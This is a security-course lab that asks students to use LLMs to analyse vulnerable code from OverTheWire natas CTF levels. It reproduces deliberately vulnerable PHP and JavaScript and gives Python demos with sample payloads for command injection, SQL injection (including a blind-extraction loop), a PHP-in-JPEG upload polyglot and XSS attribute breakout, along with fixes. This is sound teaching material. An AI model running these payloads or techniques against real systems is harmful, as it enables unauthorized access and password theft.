Using an LLM such as ChatGPT, Gemini, or Copilot to help analyze vulnerabilities in source code and running services is one potential use of generative AI. To leverage this capability, one must understand which tasks the models can perform reliably. In this lab, you will use LLMs to automate the detection of vulnerable services and source code examples, then determine whether the results are accurate.
For this exercise, we'll use CTF levels with known solutions so we can vet the accuracy of the LLMs in identifying vulnerabilities. One of the CTFs we will use is OverTheWire's natas CTF. Visit the CTF at https://overthewire.org/wargames/natas/

To access individual levels, we'll need to utilize credentials discovered in prior levels. A database of (hopefully) up-to-date credentials can be found at the following Gist. Visit the link, then copy the natas1 password. Then, visit Level 1 and authenticate with the username natas1 and the password for the account from the Gist. For the subsequent levels, you will need to perform the same steps to access each level.
Access Level 6 of the natas CTF and view its source code. The PHP program for the level includes a secret from the file system and uses it in the web application to authenticate access. If one can directly access the includes/secret.inc file, the level can be solved.
<html><body>
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
Consider the PHP program below from Level 8 of the OverTheWire natas CTF. The code includes an encoded secret within the script itself, along with the function used to encode it. If one can decode the secret, the level can be solved.
<html><body>
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
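One way to vet the LLM's answer for this level is to reverse the encoding yourself. The sketch below is a Python rendering of encodeSecret() from the listing, plus an inverse that undoes the three steps in the opposite order. The function names encode_secret and decode_secret are chosen here for illustration and are not part of the level.

```python
import base64

# Value copied from the level's source listing.
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Python equivalent of bin2hex(strrev(base64_encode($secret)))."""
    b64 = base64.b64encode(secret.encode("ascii"))
    return b64[::-1].hex()  # reverse the Base64 text, then hex-encode it


def decode_secret(encoded: str) -> str:
    """Undo the steps in reverse order: hex -> reverse -> Base64 decode."""
    reversed_b64 = bytes.fromhex(encoded)
    b64 = reversed_b64[::-1]
    return base64.b64decode(b64).decode("ascii")


if __name__ == "__main__":
    candidate = decode_secret(ENCODED_SECRET)
    # Re-encoding the candidate should reproduce the stored value exactly.
    print(candidate, encode_secret(candidate) == ENCODED_SECRET)
```

If the value the LLM reports does not re-encode to the stored string, its decoding is wrong.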
Command injection is a catastrophic vulnerability to have in web applications. Consider the PHP program below from Level 9 of the OverTheWire natas CTF. The code allows one to search a file on the server for a given string by placing the string directly into a shell command that is run with passthru().
<html><body>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
</pre>
</body>
</html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
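To see why raw interpolation is dangerous, it can help to look at the command string the shell actually receives. The sketch below is a Python analogy, not the level's code: build_unsafe_command mirrors the PHP string interpolation, while build_quoted_command uses shlex.quote so that a POSIX shell treats the input as a single word (PHP offers escapeshellarg() for a similar purpose). The payload shown is a harmless, hypothetical example.

```python
import shlex


def build_unsafe_command(key: str) -> str:
    # Mirrors passthru("grep -i $key dictionary.txt"): the input is pasted in raw.
    return f"grep -i {key} dictionary.txt"


def build_quoted_command(key: str) -> str:
    # shlex.quote wraps the value so the shell sees one literal argument.
    # "--" tells grep that no further options follow.
    return f"grep -i -- {shlex.quote(key)} dictionary.txt"


if __name__ == "__main__":
    payload = "; id #"  # hypothetical input: ends grep, runs id, comments out the rest
    print(build_unsafe_command(payload))   # the shell would see two commands
    print(build_quoted_command(payload))   # the shell would see one grep call
    print(shlex.split(build_quoted_command(payload)))
```

Avoiding the shell entirely, by passing an argument list to the process API instead of a command string, is usually the more robust design.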
Any remedy that filters characters to prevent the prior command injection vulnerability must account for every way that commands can be introduced in the shell. Consider the PHP program below from Level 16 of the OverTheWire natas CTF. A regular expression is now used to reject input containing the characters ;, |, &, `, ', and ", since they can be used to inject rogue commands on the command line. The input is also wrapped in double quotes before being passed to grep.
<html><body>
For security reasons, we now filter even more on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&`\'"]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i \"$key\" dictionary.txt");
}
}
?>
</pre>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Examine the list of characters that might fix this vulnerability here. Then, prompt the LLM for instructions on how to fix the vulnerability
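A quick way to test any filter an LLM proposes is to model it and try candidate inputs against it. The sketch below reproduces the level's character class in Python (the names passes_filter and build_command are illustrative). It shows that the $( ... ) command substitution syntax contains none of the blocked characters, and a POSIX shell still expands it inside double quotes.

```python
import re

# Same character class as the level's preg_match('/[;|&`\'"]/', $key).
BLOCKED = re.compile(r"""[;|&`'"]""")


def passes_filter(key: str) -> bool:
    """True when the input contains none of the blocked characters."""
    return BLOCKED.search(key) is None


def build_command(key: str) -> str:
    # Mirrors passthru("grep -i \"$key\" dictionary.txt").
    return f'grep -i "{key}" dictionary.txt'


if __name__ == "__main__":
    for candidate in ["; id", "`id`", "$(id)"]:
        verdict = "allowed" if passes_filter(candidate) else "blocked"
        print(f"{candidate!r}: {verdict} -> {build_command(candidate)}")
```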
Consider the PHP program below from Level 12 of the OverTheWire natas CTF. The code implements a file upload function that allows a user to upload a JPEG image. Unfortunately, while the form sent to the user sets the extension to .jpg in a hidden field, the extension is not validated at the server, which uses pathinfo() in PHP to pull out whatever extension the client sends.
<html><body>
<?php
function genRandomString() {
$length = 10;
$characters = "0123456789abcdefghijklmnopqrstuvwxyz";
$string = "";
for ($p = 0; $p < $length; $p++) {
$string .= $characters[mt_rand(0, strlen($characters)-1)];
}
return $string;
}
function makeRandomPath($dir, $ext) {
do {
$path = $dir."/".genRandomString().".".$ext;
} while(file_exists($path));
return $path;
}
function makeRandomPathFromFilename($dir, $fn) {
$ext = pathinfo($fn, PATHINFO_EXTENSION);
return makeRandomPath($dir, $ext);
}
if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else {
echo "There was an error uploading the file, please try again!";
}
}
} else {
?>
<form enctype="multipart/form-data" action="index.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="1000" />
<input type="hidden" name="filename" value="<?php print genRandomString(); ?>.jpg" />
Choose a JPEG to upload (max 1KB):<br/>
<input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
<?php } ?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
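When judging a fix the LLM suggests, the key question is whether the server still trusts the client-supplied filename. The sketch below contrasts the two behaviors in Python. It is an analogy to the PHP logic rather than a port: the function names and the allow-list are assumptions made for illustration.

```python
import os
import secrets

# Assumed allow-list for this sketch; the level itself has none.
ALLOWED_EXTENSIONS = {"jpg", "jpeg"}


def client_extension(filename: str) -> str:
    # Roughly what pathinfo($fn, PATHINFO_EXTENSION) returns.
    return os.path.splitext(filename)[1].lstrip(".")


def vulnerable_target_path(upload_dir: str, client_filename: str) -> str:
    # Random name, but the extension comes straight from the client.
    return f"{upload_dir}/{secrets.token_hex(5)}.{client_extension(client_filename)}"


def safer_target_path(upload_dir: str, client_filename: str) -> str:
    # Reject anything outside the allow-list and never echo the client's extension.
    if client_extension(client_filename).lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("only JPEG uploads are accepted")
    return f"{upload_dir}/{secrets.token_hex(5)}.jpg"


if __name__ == "__main__":
    print(vulnerable_target_path("upload", "shell.php"))  # ends in .php
    print(safer_target_path("upload", "photo.JPG"))       # ends in .jpg
```

An extension check alone does not validate the file's contents, so it is best combined with storing uploads where the server will not execute them.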
The next level, Level 13, is identical, except that the exif_imagetype() call is used to validate that the uploaded file is an image. The function determines the image type from the signature bytes at the beginning of the file and does not inspect the rest of the contents, so this check is not foolproof. Modify the previous level to add the following check. Then repeat the analysis.
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
echo "File is not an image";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
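The weakness of a signature-only check can be illustrated without PHP. The sketch below uses a simplified stand-in for the image check, looks_like_jpeg, which only compares the first three bytes against the JPEG signature. It is an assumption-laden model for illustration, not the actual implementation of exif_imagetype().

```python
# First three bytes of a JPEG file.
JPEG_MAGIC = b"\xff\xd8\xff"


def looks_like_jpeg(data: bytes) -> bool:
    """Simplified stand-in for a signature check: inspects only the leading bytes."""
    return data.startswith(JPEG_MAGIC)


if __name__ == "__main__":
    php_code = b"<?php /* attacker-controlled code */ ?>"
    polyglot = JPEG_MAGIC + php_code  # valid signature followed by script text

    print(looks_like_jpeg(php_code))  # False: plain script is rejected
    print(looks_like_jpeg(polyglot))  # True: signature check passes
    print(php_code in polyglot)       # True: the script is still in the file
```

Because the extension is still taken from the client, a file that passes this check can be stored under a name the server will execute.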
SQL injection is one of the most impactful vulnerabilities in web applications. Code should never be written with such a vulnerability, and LLMs should be able to identify and automatically fix vulnerable code. Consider the PHP program below from Level 14 of the OverTheWire natas CTF. The code implements a simple login application by taking the username and password fields that the user submits and then performing a SQL query to determine whether or not they match what's in the database. Because the query is built by concatenating the submitted values into the SQL string, it is vulnerable to the canonical SQL injection attack.
<html><body>
<?php
if(array_key_exists("username", $_REQUEST)) {
$link = mysqli_connect('localhost', 'natas14', '<censored>');
mysqli_select_db($link, 'natas14');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
if(mysqli_num_rows(mysqli_query($link, $query)) > 0) {
echo "Successful login! The password for natas15 is <censored><br>";
} else {
echo "Access denied!<br>";
}
mysqli_close($link);
} else {
?>
<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<?php } ?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
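The difference between a concatenated query and a parameterized one can be reproduced locally. The sketch below uses Python's built-in sqlite3 module with an in-memory table as a stand-in for the level's MySQL database. The table contents, function names, and the single-quoted SQL are assumptions made for the demonstration (the level itself uses double quotes and mysqli, which also supports prepared statements).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Throwaway in-memory database with one made-up account.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    # Same pattern as the level: user input is concatenated into the SQL text.
    query = ("SELECT * FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return db.execute(query).fetchone() is not None


def login_parameterized(db: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders keep the input as data; it is never parsed as SQL.
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1' --"  # closes the string, adds a tautology, comments out the rest
    print(login_vulnerable(db, payload, "anything"))     # True
    print(login_parameterized(db, payload, "anything"))  # False
```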
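The next level (natas Level 15) still contains the vulnerability, but the script's only output is whether or not the given user exists. Any other data, such as a password, must therefore be inferred one yes/no answer at a time, a technique known as blind SQL injection.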
<html><body>
<?php
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
$link = mysqli_connect('localhost', 'natas15', '<censored>');
mysqli_select_db($link, 'natas15');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysqli_query($link, $query);
if($res) {
if(mysqli_num_rows($res) > 0) {
echo "This user exists.<br>";
} else {
echo "This user doesn't exist.<br>";
}
} else {
echo "Error in query.<br>";
}
mysqli_close($link);
} else {
?>
<form action="index.php" method="POST">
Username: <input name="username"><br>
<input type="submit" value="Check existence" />
</form>
<?php } ?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have as well as for a program that can leverage the vulnerability to produce the password for the natas16 user.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
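A program returned by the LLM for this level should follow a recognizable pattern: guess one character at a time and use the exists/doesn't-exist response as an oracle. The sketch below shows that loop in Python against a local, deliberately vulnerable SQLite stand-in so it can be run offline. Against the real level, user_exists would instead send an authenticated HTTP request and look for "This user exists" in the response. The alphabet, function names, and demo password are all assumptions.

```python
import sqlite3
import string

ALPHABET = string.ascii_letters + string.digits  # assumed password character set


def make_demo_oracle(secret: str):
    """Build a local yes/no oracle backed by a deliberately injectable query."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("natas16", secret))

    def user_exists(username: str) -> bool:
        # Vulnerable on purpose: input is concatenated, as in the level.
        query = "SELECT * FROM users WHERE username='" + username + "'"
        return db.execute(query).fetchone() is not None

    return user_exists


def extract_password(user_exists, target: str = "natas16", max_len: int = 64) -> str:
    recovered = ""
    while len(recovered) < max_len:
        for ch in ALPHABET:
            guess = recovered + ch
            # The query's own closing quote terminates the final string literal.
            payload = f"{target}' AND substr(password, 1, {len(guess)}) = '{guess}"
            if user_exists(payload):
                recovered = guess
                break
        else:
            break  # no character extended the prefix, so the password is complete
    return recovered


if __name__ == "__main__":
    oracle = make_demo_oracle("Ab3xZ9")  # made-up password for the demo
    print(extract_password(oracle))
```

When porting this to the real level, check that the comparison is case-sensitive in the target database, since a case-insensitive match would recover the wrong letter case.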
A dynamic and weakly typed programming language can lead developers to make unintended errors unless they understand the rules by which data is coerced from one type to another. Consider the PHP program below from Level 23 of the OverTheWire natas CTF. The program checks for a passwd key in the request. The key's value must contain the string 'iloveyou' and must also compare as greater than the number 10. Can this ever happen?
<html><body>
Password:
<form name="input" method="get">
<input type="text" name="passwd" size=20>
<input type="submit" value="Login">
</form>
<?php
if(array_key_exists("passwd",$_REQUEST)){
if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
echo "<br>The credentials for the next level are:<br>";
echo "<pre>Username: natas24 Password: <censored></pre>";
}
else{
echo "<br>Wrong!<br>";
}
}
?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
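To reason about whether both conditions can hold at once, it helps to model the coercion explicitly. The Python sketch below is a simplified model of how PHP versions before 8 convert a string for a numeric comparison, using only its leading integer prefix and falling back to 0. It ignores floats and exponents, and the function names are illustrative, so treat it as an aid for checking the LLM's explanation rather than a specification of PHP.

```python
import re


def php7_int_prefix(value: str) -> int:
    """Simplified model: use the leading integer of the string, or 0 if there is none."""
    match = re.match(r"\s*[+-]?\d+", value)
    return int(match.group()) if match else 0


def check(passwd: str) -> bool:
    # Mirrors: strstr($passwd, "iloveyou") && ($passwd > 10)
    return "iloveyou" in passwd and php7_int_prefix(passwd) > 10


if __name__ == "__main__":
    for candidate in ["iloveyou", "10iloveyou", "11iloveyou"]:
        print(candidate, check(candidate))
```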
Another common problem with a dynamic and weakly typed programming language is type juggling, where comparisons are made between values of disparate data types. When this happens, type coercion rules are applied to convert one value's data type to the other's. Consider the PHP program below from Level 24 of the OverTheWire natas CTF. The program checks that a password matches a particular string that is kept secret at the server using the strcmp() call in PHP.
<html><body>
Password:
<form name="input" method="get">
<input type="text" name="passwd" size=20>
<input type="submit" value="Login">
</form>
<?php
if(array_key_exists("passwd",$_REQUEST)){
if(!strcmp($_REQUEST["passwd"],"<censored>")){
echo "<br>The credentials for the next level are:<br>";
echo "<pre>Username: natas25 Password: <censored></pre>";
}
else{
echo "<br>Wrong!<br>";
}
}
?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
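The logic flaw here depends on what the comparison returns when it is handed something other than a string. The sketch below is a rough Python model, assuming the behavior of PHP versions before 8, where strcmp() given an array yields NULL and negating NULL yields true. Python's `not None` behaves the same way, which makes the parallel easy to see. The function names are made up for this illustration.

```python
import hmac


def php7_strcmp_model(a, b):
    """Rough model: None for non-string arguments, else negative/zero/positive."""
    if not isinstance(a, str) or not isinstance(b, str):
        return None
    return (a > b) - (a < b)


def vulnerable_check(passwd, secret: str) -> bool:
    # Mirrors if(!strcmp(...)): both 0 and None are falsy, so both pass.
    return not php7_strcmp_model(passwd, secret)


def stricter_check(passwd, secret: str) -> bool:
    # Refuse anything that is not a string, then compare in constant time.
    if not isinstance(passwd, str):
        return False
    return hmac.compare_digest(passwd.encode(), secret.encode())


if __name__ == "__main__":
    secret = "not-the-real-secret"
    print(vulnerable_check(["anything"], secret))  # True: a list slips through
    print(stricter_check(["anything"], secret))    # False
    print(stricter_check(secret, secret))          # True
```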
Cross-site scripting (XSS) is another impactful vulnerability in web applications. Consider the vulnerable JavaScript snippet below, which writes the URL's query string into the style attribute of the body tag.
<script type="text/javascript">
document.write('<body');
var color = unescape(document.location.search.substring(1));
if (color != '') {
document.write(' style="background-color:' + color + '"');
}
document.write('>');
</script>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
There are multiple ways to address this vulnerability. Prompt the LLM for instructions on how to fix the vulnerability using a character filtering approach, where the characters that might break syntax are removed from the color parameter.
Then, prompt the LLM for instructions on how to fix the vulnerability using a character encoding approach where characters that might break syntax are encoded as data in an HTML-attribute context.
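The two approaches can be compared side by side before evaluating the LLM's answers. The sketch below uses Python to show the effect on the generated tag. The allow-list in filter_color and the helper names are assumptions for illustration, and the real fix would be written in JavaScript inside the page.

```python
import html
import re


def filter_color(color: str) -> str:
    """Filtering: drop every character outside a small allow-list."""
    return re.sub(r"[^A-Za-z0-9#]", "", color)


def encode_color(color: str) -> str:
    """Encoding: keep every character, but as HTML entities where needed."""
    return html.escape(color, quote=True)


def body_tag(color: str) -> str:
    # Same shape as the tag the snippet builds with document.write().
    return f'<body style="background-color:{color}">'


if __name__ == "__main__":
    payload = 'red" onload="alert(1)'  # tries to close the attribute and add a handler
    print(body_tag(payload))                # attribute is broken out of
    print(body_tag(filter_color(payload)))  # dangerous characters removed
    print(body_tag(encode_color(payload)))  # quotes become &quot; and stay inside the attribute
```

Filtering changes the user's input, while encoding preserves it as data. In both cases the value still ends up in a CSS context, so validating it as a color is a reasonable extra step.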
Consider the vulnerable JavaScript snippet below, which writes the search query parameter into the page using innerHTML.
<h1>
<span>Search results for '</span><span id="searchMessage"></span><span>'</span>
</h1>
<script>
function doSearchQuery(query) {
document.getElementById('searchMessage').innerHTML = query;
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
doSearchQuery(query);
}
</script>